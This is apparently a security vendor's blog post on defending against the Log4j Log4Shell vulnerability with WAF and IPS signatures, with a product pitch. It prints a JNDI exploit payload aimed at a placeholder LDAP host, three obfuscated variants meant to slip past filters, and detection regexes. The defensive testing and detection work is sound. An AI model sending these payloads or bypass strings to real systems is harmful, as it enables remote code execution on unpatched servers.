The Log4j Vulnerability Remediation with WAF and IPS
The Apache Log4j vulnerability is wreaking havoc and has had a far greater impact than anticipated. We published a detailed blog post about the CVE-2021-44228 Log4j vulnerability and its exploitation on Friday, 10th December. However, in the past three days, we have seen that there is still great panic despite a patch being available for Log4j.
When we looked at the reason for this situation, we realized that fully patching all vulnerable software is not that easy. You need to enumerate and patch every vulnerable system and piece of software in your environment, which is a time-consuming task.
However, most security teams don't have that time, since attackers are already exploiting the vulnerability in the wild. That is why we have invested in our cybersecurity products. Security teams can use their existing network security controls, such as WAFs, IPSs, and NGFWs, to prevent CVE-2021-44228 exploitation attacks and gain time for full patching. US CISA also recommends using a WAF so that your SOC can concentrate on fewer alerts.
This blog aims to help security teams gain time to fully mitigate and remediate their systems by explaining how to simulate CVE-2021-44228 attacks before attackers do, and how to use their existing security controls to prevent CVE-2021-44228 attacks.
Log4j Vulnerability Explained
Apache Log4j is a widely used Java logging framework found in many commercial and open-source software products. CVE-2021-44228 is a remote code execution (RCE) vulnerability that can be exploited without authentication. Its criticality is rated 10 (out of 10) in the Common Vulnerability Scoring System (CVSS).
The vulnerability exists because of how Log4j processes log messages. Apache Log4j2 versions 2.0 through 2.14.1 do not protect against attacker-controlled LDAP (Lightweight Directory Access Protocol) and other JNDI (Java Naming and Directory Interface) related endpoints. If an attacker sends a specially crafted message, the library may load an external code class and execute it (RCE).
Test your security controls NOW: Prevent Log4Shell Exploits with Picus
Log4j Vulnerability Updates (CVE-2021-44832, CVE-2021-45105, CVE-2021-45046)
Update (December 28, 2021): A new vulnerability (CVE-2021-44832) was found in Apache Log4j2 versions 2.0-beta7 through 2.17.0. CVE-2021-44832 is an arbitrary code execution vulnerability. Since exploiting it requires an attacker with permission to modify the logging configuration, its severity is lower than that of Log4Shell (CVE-2021-44228); its base CVSS score is 6.6 (medium). This vulnerability is fixed in Log4j versions 2.17.1 (Java 8), 2.12.4 (Java 7) and 2.3.2 (Java 6).
Update (December 16, 2021): Recently, two new vulnerabilities related to Log4j have been found. An information leak and remote/local code execution vulnerability (CVE-2021-45046) was discovered on December 14th, 2021. Its CVSS score is 9.0 (critical).
CVE-2021-45046 was followed by CVE-2021-45105, a denial of service (DoS) vulnerability with a CVSS score of 7.5 (high).
Why Do I Need to Prevent CVE-2021-44228 Log4j Vulnerability?
The CVE-2021-44228 vulnerability enables remote code execution on systems running vulnerable Log4j versions and gives the attacker full control of the affected server. Numerous organizations have reported an increase in exploitation attempts for the vulnerability. For example, Deutsche Telekom CERT reported widespread attacks on its honeypot infrastructure via the Tor network.
The exploitation attempts observed so far have been used to distribute mass malware such as Mirai, Kinsing, and Tsunami (aka Muhstik). These botnets are primarily used to launch distributed denial-of-service attacks (Mirai, Tsunami) or to mine cryptocurrencies (Kinsing).
We are confident that this is the most critical vulnerability that has emerged in recent years.
Update: The Microsoft Threat Intelligence Center says that nation-state actors are adding new techniques to their arsenals using the Log4j vulnerabilities. Known APTs such as HAFNIUM and PHOSPHORUS are using these vulnerabilities to improve their ransomware capabilities.
How Can I Prevent Log4j Vulnerability Exploitation Attacks?
You need to take the following steps regarding this vulnerability.
- Discover any assets using Apache Log4j in your environment.
- Patch all assets that use vulnerable versions of Log4j (version 2.0 - 2.14.1).
- Ensure that your security operations center (SOC) responds to each alert generated for vulnerable assets.
However, depending on the size of your environment, these tasks can take days, weeks, or even months. Therefore, as Picus, we advise you to take the following immediate steps:
- Simulate Log4j exploitation attacks to test your security controls
- Enable relevant prevention signatures in your security controls
In the following sections, you can find how to test security controls against Log4j attacks and a list of prevention signatures provided by security vendors.
Update: Apache has patched Log4j to remedy the recently found vulnerabilities; upgrading vulnerable versions of Log4j to version 2.17.0 is important to prevent exploitation.
How Can I Test My Security Controls Against Log4j Attacks?
The most basic Log4j exploit payload to test security controls is:
`${jndi:ldap://malicious-ldap-server.com/a}`
This exploit payload is explained in our previous blog post. To measure the actual effectiveness of your security products against Log4j vulnerability exploitation attacks, you should test all valid variants of this Log4j exploit PoC payload. You can generate these variants with the following methods:
1- Using the payload in different parts of an HTTP request
CVE-2021-44228 exploit payloads can work in any part of an HTTP request:
- URL
- Request headers
- Body
Request headers include, but are not limited to, X-Api-Version, User-Agent, Cookie, Referer, Accept-Language, Accept-Encoding, Upgrade-Insecure-Requests, Accept, Origin, Pragma, and Content-Type. Note that some public PoC exploit scripts send the payload only in the X-Api-Version header, but other headers can be used for exploitation.
2- Using the payload with different JNDI related naming services
Although most public Log4j exploit examples use LDAP, attackers exploit all JNDI-related naming services:
- LDAP (Lightweight Directory Access Protocol)
- DNS (Domain Name System)
- RMI (Remote Method Invocation)
- NDS (Novell Directory Services)
- NIS (Network Information Service)
- CORBA (Common Object Request Broker Architecture)
3- Using bypass methods
Some security controls rely on strict keywords to detect malicious Log4j exploit code. Attackers may evade these controls by obfuscating those keywords. For example, JNDI and the naming service name (e.g., LDAP, DNS) are obvious keywords in CVE-2021-44228 exploit payloads; obfuscated versions of these keywords can be used in Log4j exploitation attacks to disguise the payload and bypass security controls, such as:
- `${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://example.com/a}`
- `${jndi:${lower:l}${lower:d}a${lower:p}://example.com/a}`
- `${${env:TEST:-j}ndi${env:TEST:-:}${env:TEST:-l}dap${env:TEST:-:}//example.com}`
How Can I Test My Security Controls with Picus in Minutes?
To test your security controls manually, you can use the payloads above. However, generating all applicable payloads, setting up a test environment, and testing your security controls against all of them is also a time-consuming process.
Fortunately, with the Picus platform you can simulate Log4j CVE-2021-44228 vulnerability exploitation attacks within minutes to test the effectiveness of your security controls against Log4j attacks. The Picus platform simulates attacks automatically without causing any damage to your environment and continuously validates your security controls.
The Picus Threat Library includes the following attacks for the Log4j CVE-2021-44228 vulnerability. Moreover, it currently contains 1500+ vulnerability exploitation attacks in addition to 11,000+ other threats.
Update: The tables below have been updated in accordance with the recently found CVE-2021-45046 and CVE-2021-45105 vulnerabilities.
| Threat ID | Action Name | Attack Module | 
| 21296 | Apache Log4j Web Attack Campaign | Web Application | 
Log4j Vulnerability Remediation Using F5, Citrix, Fortinet and ModSecurity WAFs
It is possible to prevent Log4j attacks using the signatures below, provided by network security vendors. The Picus platform provides prevention signatures for CVE-2021-44228 and other vulnerabilities. The following table lists Web Application Firewall (WAF) signatures for the Log4j2 vulnerability (CVE-2021-44228).
| Security Control | Signature IDs | Signature Name | 
| F5 BIG-IP ASM | 200104768 | JNDI Injection Attempt (Parameter) | 
| F5 BIG-IP ASM | 200104772 | JNDI Injection Attempt (Content) | 
| F5 BIG-IP ASM | 200104769 | JNDI Injection Attempt (Header) | 
| F5 BIG-IP ASM | 200104723 | JNDI Injection Attempt (ldap) (Header) | 
| F5 BIG-IP ASM | 200104725 | JNDI Injection Attempt (rmi) (Header) | 
| F5 BIG-IP ASM | 200004451 | JSP Expression Language Expression Injection (2) (Header) | 
| F5 BIG-IP ASM | 200004450 | JSP Expression Language Expression Injection (2) (Parameter) | 
| F5 BIG-IP ASM | 200104773 | JSP Expression Language Expression Injection (3) (Content) | 
| F5 BIG-IP ASM | 200104771 | JSP Expression Language Expression Injection (3) (Header) | 
| F5 BIG-IP ASM | 200104770 | JSP Expression Language Expression Injection (3) (Parameter) | 
| F5 BIG-IP ASM | 200004474 | JSP Expression Language Expression Injection (3) (URI) | 
| FortiWeb Web Application Security | 90490119, 90490120 | Known Exploits | 
| Citrix Web App Firewall | 999078 | WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via BODY (CVE-2021-44228) | 
| Citrix Web App Firewall | 999077 | WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via FORM (CVE-2021-44228) | 
| Citrix Web App Firewall | 999079 | WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via HEADER (CVE-2021-44228) | 
| Citrix Web App Firewall | 999080 | WEB-MISC Apache Log4j - Remote Code Execution Vulnerability via URL (CVE-2021-44228) | 
| ModSecurity | 932100 | Remote Command Execution: Unix Command Injection | 
| ModSecurity | 932130 | Remote Command Execution: Unix Shell Expression Found | 
Log4j Vulnerability Remediation Using Cisco, Check Point, Fortinet, Palo Alto Networks, Forcepoint and Snort IPSs and NGFWs
The following table includes Next Generation Firewall (NGFW) and Intrusion Prevention System (IPS) signatures for the Log4j vulnerability.
| Security Control | Signature IDs | Signature Name | 
| Forcepoint NGFW | Generic_CS-Log4j-Remote-Code-Execution | |
| Forcepoint NGFW | HTTP_CS_Log4j-Remote-Code-Execution | |
| Palo Alto Networks NGFW | 91991, 91994, 92001 | Apache Log4j Remote Code Execution Vulnerability | 
| Check Point NGFW | asm_dynamic_prop_CVE_2021_44228 | Apache Log4j Remote Code Execution (CVE-2021-44228) | 
| FortiGate NGFW | 51006 | Apache.Log4j.Error.Log.Remote.Code.Execution | 
| Cisco Firepower NGFW | 58722, 58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58737, 58738, 58739, 58742, 58744 | SERVER-OTHER Apache Log4j logging remote code execution attempt | 
| Snort IPS | 2034655 | ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228) | 
| Snort IPS | 2034647 | ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228) | 
| Snort IPS | 2034658 | ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228) | 
| Snort IPS | 2034648 | ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228) | 
| Snort IPS | 2034654 | ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228) | 
| Snort IPS | 2034668 | ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228) | 
| Snort IPS | 2034649 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228) | 
| Snort IPS | 2034657 | ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228) | 
| Snort IPS | 2034650 | ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228) | 
| Snort IPS | 2034653 | ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228) | 
| Snort IPS | 2034667 | ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228) | 
| Snort IPS | 2034651 | ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228) | 
| Snort IPS | 2034656 | ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228) | 
| Snort IPS | 2034652 | ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228) | 
| Snort IPS | 2034659 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass (CVE-2021-44228) | 
| Snort IPS | 2034659 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper TCP Bypass M1 (CVE-2021-44228) | 
| Snort IPS | 2034660 | ET EXPLOIT Apache log4j RCE Attempt - lower/upper UDP Bypass (CVE-2021-44228) | 
| Snort IPS | 2034673 | ET EXPLOIT Possible Apache log4j RCE Attempt - 2021/12/12 Obfuscation Observed M2 (CVE-2021-44228) | 
| Snort IPS | 2034661, 2034662 | ET INFO Possible Apache log4j RCE Attempt - Any Protocol (CVE-2021-44228) | 
| Snort IPS | 2034665, 2034666 | ET INFO Possible Apache log4j RCE Attempt - Any Protocol lower Bypass (CVE-2021-44228) | 
| Snort IPS | 2034663, 2034664 | ET INFO Possible Apache log4j RCE Attempt - Any Protocol upper Bypass (CVE-2021-44228) | 
| Snort IPS | 58722, 58723, 58724, 58725, 58726, 58727, 58728, 58729, 58730, 58731, 58732, 58733, 58737, 58738, 58739, 58744 | SERVER-OTHER Apache Log4j logging remote code execution attempt | 
| McAfee NSP | 0x4529f700 | HTTP: Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228) | 
| TippingPoint TPS | 40627 | HTTP: JNDI Injection in HTTP Request | 
Log4j Attack Detection and Log4j Exploit Discovery with Custom Signatures
If the network security product you use is not included in the tables above, you can use the following regular expressions, developed and validated by Picus Labs:
| Signature Name | Signature | 
| Generic Apache Log4J RCE Attempt | \$\{jndi\: | 
| Specific Apache Log4J RCE Attempt | \$\{jndi\:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[\/]?[^\n]+ | 
| Log4J RCE WAF Bypass Attempt (1) | \$\{jndi\:\${(lower|upper)\: | 
| Log4J RCE WAF Bypass Attempt (2) | \${\:\:-j}\${ | 
Log4j Vulnerable Versions
The CVE-2021-44228 vulnerability affects Apache Log4j versions 2.0 to 2.14.1. SHA-256 hashes and default filenames of all vulnerable Log4j versions are given in our previous blog post.